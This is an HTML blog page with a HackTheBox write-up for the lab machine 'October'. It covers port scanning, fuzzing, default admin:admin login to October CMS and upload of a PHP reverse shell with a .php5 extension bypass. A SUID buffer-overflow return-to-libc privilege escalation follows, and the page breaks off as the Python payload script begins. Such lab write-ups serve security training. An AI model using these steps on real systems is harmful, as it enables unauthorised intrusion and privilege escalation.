<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.16[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s port with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.16
 But this is going too slow, so let&amp;rsquo;s get a faster scan with
 nmap -p- &amp;ndash;open &amp;ndash;min-rate 5000 10.'><title>[14] October Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/october-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[14] October Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.16[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s port with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.16
 But this is going too slow, so let&amp;rsquo;s get a faster scan with
 nmap -p- &amp;ndash;open &amp;ndash;min-rate 5000 10.'>
<meta property='og:url' content='https://example.com/posts/october-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-04-02T01:29:16&#43;02:00'/><meta property='article:modified_time' content='2021-04-02T01:29:16&#43;02:00'/>
<meta name="twitter:title" content="[14] October Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.16[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s port with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.16
 But this is going too slow, so let&amp;rsquo;s get a faster scan with
 nmap -p- &amp;ndash;open &amp;ndash;min-rate 5000 10.">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/october-hackthebox/">[14] October Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Apr 02, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/october-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Medium :first_quarter_moon:
Owner : ch4p
IP : 10.10.10.16
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>The first step is scanning machine&rsquo;s port with nmap:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;--open&#43;-T5&#43;-n&#43;10.10.10.16"  target="_blank" rel="noopener"
    >nmap -p- &ndash;open -T5 -n 10.10.10.16</a></p>
</blockquote>
<p>But this is going too slow, so let&rsquo;s get a faster scan with</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;--open&#43;--min-rate&#43;5000&#43;10.10.10.16"  target="_blank" rel="noopener"
    >nmap -p- &ndash;open &ndash;min-rate 5000 10.10.10.16</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre><p>Once seen open ports, let&rsquo;s get a deeper scan :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sV&#43;-sC&#43;-sS&#43;-p22%2C80&#43;10.10.10.16"  target="_blank" rel="noopener"
    >nmap -sV -sC -sS -p22,80 10.10.10.16</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Nothins interesting here, let&rsquo;s check the website :</p>
<p><img src="/static/HACKING/october-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Interesting, maybe there is has an exploit for it , but first and foremost let&rsquo;s fuzz the website, in my case I&rsquo;ll be using <code>wfuzz</code> :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt &ndash;hc=404 -u http://10.10.10.16/FUZZ -L</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="o">********************************************************</span>
<span class="o">*</span> <span class="n">Wfuzz</span> <span class="m">3.1.0</span> <span class="o">-</span> <span class="n">The</span> <span class="n">Web</span> <span class="n">Fuzzer</span>                         <span class="o">*</span>
<span class="o">********************************************************</span>

<span class="n">Target</span><span class="o">:</span> <span class="n">http</span><span class="o">://</span><span class="m">10.10.10.16</span><span class="o">/</span><span class="n">FUZZ</span>
<span class="n">Total</span> <span class="n">requests</span><span class="o">:</span> <span class="m">207643</span>

<span class="o">=====================================================================</span>
<span class="n">ID</span>           <span class="n">Response</span>   <span class="n">Lines</span>    <span class="n">Word</span>       <span class="n">Chars</span>       <span class="n">Payload</span>                                                                                                                                                                   
<span class="o">=====================================================================</span>

<span class="m">000000067</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">216</span> <span class="n">L</span>    <span class="m">384</span> <span class="n">W</span>      <span class="m">9589</span> <span class="n">Ch</span>     <span class="s">&#34;forum&#34;</span>                                                                                                                                                                   
<span class="m">000000345</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">145</span> <span class="n">L</span>    <span class="m">265</span> <span class="n">W</span>      <span class="m">5090</span> <span class="n">Ch</span>     <span class="s">&#34;account&#34;</span>                                                                                                                                                                 
<span class="m">000000754</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">83</span> <span class="n">L</span>     <span class="m">173</span> <span class="n">W</span>      <span class="m">3641</span> <span class="n">Ch</span>     <span class="s">&#34;backend&#34;</span>                                                                                                                                                                 
<span class="m">000002530</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">77</span> <span class="n">L</span>     <span class="m">178</span> <span class="n">W</span>      <span class="m">3340</span> <span class="n">Ch</span>     <span class="s">&#34;error&#34;</span>                                                                                                                                                                   

<span class="n">Total</span> <span class="n">time</span><span class="o">:</span> <span class="m">0</span>
<span class="n">Processed</span> <span class="n">Requests</span><span class="o">:</span> <span class="m">3117</span>
<span class="n">Filtered</span> <span class="n">Requests</span><span class="o">:</span> <span class="m">3098</span>
<span class="n">Requests</span><span class="o">/</span><span class="n">sec.</span><span class="o">:</span> <span class="m">0</span>
</code></pre></div><p>Let&rsquo;s check all those directories&hellip;</p>
<p><code>forum</code></p>
<p><img src="/static/HACKING/october-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><code>account</code></p>
<p><img src="/static/HACKING/october-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><code>backend</code></p>
<p><img src="/static/HACKING/october-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><code>error</code></p>
<p><img src="/static/HACKING/october-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Apart from backend, there is nothing interesting, so, let&rsquo;s check the login page and try to login with <code>admin:admin</code> :</p>
<p><img src="/static/HACKING/october-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/october-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>It worked :smile: ! Once here we can try to upload some kind of reverse shell to media :</p>
<p><img src="/static/HACKING/october-8.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Here we can see a php file, let&rsquo;s try to upload a php reverse shell, in my case I&rsquo;ll get it from <a class="link" href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php"  target="_blank" rel="noopener"
    >pentest monkey</a>.</p>
<p><img src="/static/HACKING/october-9.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Hmm I tried to upload a script called <code>shell.php</code>, maybe <code>.php</code> extension is not allowed, so let&rsquo;s try again calling it <code>shell.php5</code> (we can see that dr.php5 is uploaded in the system).</p>
<p><img src="/static/HACKING/october-10.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice :smile: it was uploaded ! We can see at the right of the screen that we can get the public url :</p>
<p><img src="/static/HACKING/october-11.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>But first of all we have to listen from our local machine :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=rlwrap&#43;nc&#43;-lvnp&#43;8989"  target="_blank" rel="noopener"
    >rlwrap nc -lvnp 8989</a></p>
</blockquote>
<p>And go to :</p>
<blockquote>
<p>http://10.10.10.16/storage/app/media/shell.php5</p>
</blockquote>
<p><img src="/static/HACKING/october-12.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice! To get a more &ldquo;comfortable shell&rdquo; we can run this :</p>
<pre><code>python3 -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'
export SHELL=bash
export TERM=xterm-256color
stty rows 59 columns 235
</code></pre><h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>After ennumerating the system I found an interesting SUID file :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=find&#43;%5C-perm&#43;-4000&#43;2%3E%2Fdev%2Fnull"  target="_blank" rel="noopener"
    >find -perm -4000 2&gt;/dev/null</a></p>
</blockquote>
<p><img src="/static/HACKING/october-13.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>The name of the file gives us a clue about how the exploitation is going to be, let&rsquo;s run it:</p>
<p><img src="/static/HACKING/october-14.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Seg fault is a good indication that I should look into a buffer overflow, first of all we have to check if ASLR (Address space layout randomization) is disabled, ASLR prevents the explotation of memory coruption vulnerabilities, buffer overflow for example. And we can check this here -&gt; <code>/proc/sys/kernel/randomize_va_space</code></p>
<p><img src="/static/HACKING/october-20.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>So the value is two, this means that ADSL is enabled, and we can also check this using <code>ldd</code> to list dynamic dependencies :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=ldd&#43;%2Fusr%2Flocal%2Fbin%2Fovrflw"  target="_blank" rel="noopener"
    >ldd /usr/local/bin/ovrflw</a></p>
</blockquote>
<p><img src="/static/HACKING/october-21.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>It&rsquo;s using <code>libc</code> so we can do a &ldquo;Return-to-libc attack&rdquo;, this is a type of attack that usually starts with a buffer overflow (as we already checked that is vulnerable to), here the return adress on a call stack is replaced by another address of a subroutine already present in the process executable memory and then we can bypass the NX (not executable bit). We&rsquo;ve seen that the ASLR was enabled, we can check this running ldd to <code>/usr/local/bin/ovrflw</code> multiple times and check how <code>libc</code> address has changed :</p>
<blockquote>
<p>for i in $(seq 5); do ldd /usr/local/bin/ovrflw | grep libc;done</p>
</blockquote>
<p><img src="/static/HACKING/october-22.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>As we can see here, the libc value is constantly changing, so when we get our exploit, we have to run it several times until the addr matches, because libc addr value is changing but it repeats after a while, this means that we can brute-force it. The first step of all is finding the offset of the program to see where does it crash.</p>
<p>In my case I&rsquo;ll be using <a class="link" href="https://github.com/longld/peda/releases/tag/v1.2"  target="_blank" rel="noopener"
    >gdb-peda</a> (PEDA - Python Exploit Development Assistance for GDB) , from my standpoint that&rsquo;s much more comfortable to use than the original one.</p>
<h3 id="from-our-local-machine-">From our local machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<h3 id="from-the-victim-machine-">From the victim machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;10.10.14.18%3A8000%2Fpeda-1.2.zip"  target="_blank" rel="noopener"
    >wget 10.10.14.18:8000/peda-1.2.zip</a></p>
</blockquote>
<p>And then we unzip it:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=unzip&#43;peda-1.2.zip"  target="_blank" rel="noopener"
    >unzip peda-1.2.zip</a></p>
</blockquote>
<pre><code>The program 'unzip' is currently not installed. To run 'unzip' please ask your administrator to install the package 'unzip'
</code></pre><p>Oh, so bad we don&rsquo;t have <code>unzip</code> either, so let&rsquo;s download it too from <a class="link" href="https://oss.oracle.com/el4/unzip/unzip.html"  target="_blank" rel="noopener"
    >here</a>.</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python3&#43;-m&#43;http.server"  target="_blank" rel="noopener"
    >python3 -m http.server</a></p>
</blockquote>
<h3 id="from-the-victim-machine--1">From the victim machine :</h3>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=wget&#43;10.10.14.18%3A8000%2Funzip.tar"  target="_blank" rel="noopener"
    >wget 10.10.14.18:8000/unzip.tar</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=tar&#43;-xf&#43;unzip.tar"  target="_blank" rel="noopener"
    >tar -xf unzip.tar</a></p>
</blockquote>
<blockquote>
<p>./unzip peda-1.2.zip</p>
</blockquote>
<pre><code>Archive:  peda-1.2.zip
84d38bda505941ba823db7f6c1bcca1e485a2d43
   creating: peda-1.2/
  inflating: peda-1.2/.gitignore     
  inflating: peda-1.2/LICENSE        
  inflating: peda-1.2/README         
  inflating: peda-1.2/README.md      
   creating: peda-1.2/lib/
  inflating: peda-1.2/lib/config.py  
  inflating: peda-1.2/lib/nasm.py    
  inflating: peda-1.2/lib/shellcode.py  
  inflating: peda-1.2/lib/six.py     
  inflating: peda-1.2/lib/skeleton.py  
  inflating: peda-1.2/lib/utils.py   
  inflating: peda-1.2/peda.py        
  inflating: peda-1.2/python23-compatibility.md
</code></pre><p>Now we just have to install <code>gdb-peta</code>, as they say on their <a class="link" href="https://github.com/longld/peda"  target="_blank" rel="noopener"
    >github</a>, but first we have to define our home directory, so let&rsquo;s run :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=export&#43;HOME%3D%2Ftmp"  target="_blank" rel="noopener"
    >export HOME=/tmp</a></p>
</blockquote>
<p>And now :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=echo&#43;%22source&#43;%7E%2Fpeda-1.2%2Fpeda.py%22&#43;%3E%3E&#43;%7E%2F.gdbinit"  target="_blank" rel="noopener"
    >echo &ldquo;source ~/peda-1.2/peda.py&rdquo; &raquo; ~/.gdbinit</a></p>
</blockquote>
<p>Now we can run gdb-peta, and the interest file is <code>/usr/local/bin/ovrflw</code>, let&rsquo;s run it :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=gdb&#43;%2F..%2Fusr%2Flocal%2Fbin%2Fovrflw"  target="_blank" rel="noopener"
    >gdb /../usr/local/bin/ovrflw</a></p>
</blockquote>
<p><img src="/static/HACKING/october-15.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>As we can see we&rsquo;re using gdb-peda, so let&rsquo;s create a pattern and see where the program crashes :</p>
<blockquote>
<p>pattern_create 500</p>
</blockquote>
<p>And we run the program with the pattern, the pattern 500 is a text that doesn&rsquo;t repeats, so if the program crashes at some point, we can locate the part where it crashed.</p>
<blockquote>
<p>r &lsquo;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A&rsquo;</p>
</blockquote>
<p>With &ldquo;r&rdquo;, we&rsquo;re running <code>/usr/local/bin/ovrflw</code> with that string.</p>
<p><img src="/static/HACKING/october-16.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/october-17.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And as we can see the program crashed, and we can see that it crashed at &ldquo;0x41384141&rdquo;, and as I said about the pattern, we can locate where did it crash, and then we can get the offset.</p>
<p><img src="/static/HACKING/october-18.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<blockquote>
<p>pattern_offset 0x41384141</p>
</blockquote>
<p>And it says that the program crashes with more than 112 bytes, let&rsquo;s check it manually :</p>
<p><img src="/static/HACKING/october-19.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<blockquote>
<p>r $(python -c&rsquo;print &ldquo;A&rdquo;*112 + &ldquo;B&rdquo;*4')</p>
</blockquote>
<p>The program is crashing due to the BBBB, those bytes are overwriting EIP. First of all let&rsquo;s check the offsets of system, exit, and the shell we want to spawn :</p>
<p><img src="/static/HACKING/october-23.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>To get the system and exit offsets we have to use readelf to read the ELF file, because it&rsquo;s a elf file:</p>
<p><img src="/static/HACKING/october-24.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>As we have seen before, libc is located in <code>/lib/i386-linux-gnu/libc.so.6</code>:</p>
<pre><code>ldd /usr/local/bin/ovrflw
        linux-gate.so.1 =&gt;  (0xb7791000)
        libc.so.6 =&gt; /lib/i386-linux-gnu/libc.so.6 (0xb75d7000)
        /lib/ld-linux.so.2 (0x800ec000)
</code></pre><p>We run :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=readelf&#43;-s&#43;%2Flib%2Fi386-linux-gnu%2Flibc.so.6&#43;%7C&#43;grep&#43;%22exit%22"  target="_blank" rel="noopener"
    >readelf -s /lib/i386-linux-gnu/libc.so.6 | grep &ldquo;exit&rdquo;</a></p>
</blockquote>
<p><img src="/static/HACKING/october-25.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><code>exit_offset</code> = 0x00033260</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=readelf&#43;-s&#43;%2Flib%2Fi386-linux-gnu%2Flibc.so.6&#43;%7C&#43;grep&#43;%22system%22"  target="_blank" rel="noopener"
    >readelf -s /lib/i386-linux-gnu/libc.so.6 | grep &ldquo;system&rdquo;</a></p>
</blockquote>
<p><img src="/static/HACKING/october-26.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><code>system_offset</code> = 0x00040310</p>
<p>About <code>/bin/sh</code>&rsquo;s offset we have to run strings:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=strings&#43;-a&#43;-t&#43;x&#43;%2Flib%2Fi386-linux-gnu%2Flibc.so.6&#43;%7C&#43;grep&#43;%22%2Fbin%2Fsh%22"  target="_blank" rel="noopener"
    >strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep &ldquo;/bin/sh&rdquo;</a></p>
</blockquote>
<p><img src="/static/HACKING/october-27.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><code>/bin/sh_offset</code> = 0x00162bac</p>
<h2 id="-part-21-python-script">[+] PART 2.1 Python Script</h2>
<p>Now we can make a python script to get a payload, we can build it with the info we already have :</p>
<div class="highlight"><pre class="chroma"><code class="language-py" data-lang="py"><span class="kn">import</span> <span class="nn">struct</span> 

<span class="n">trash</span> <span class="o">=</span> <span class="s2">&#34;A&#34;</span><span class="o">*</span><span class="mi">112</span>

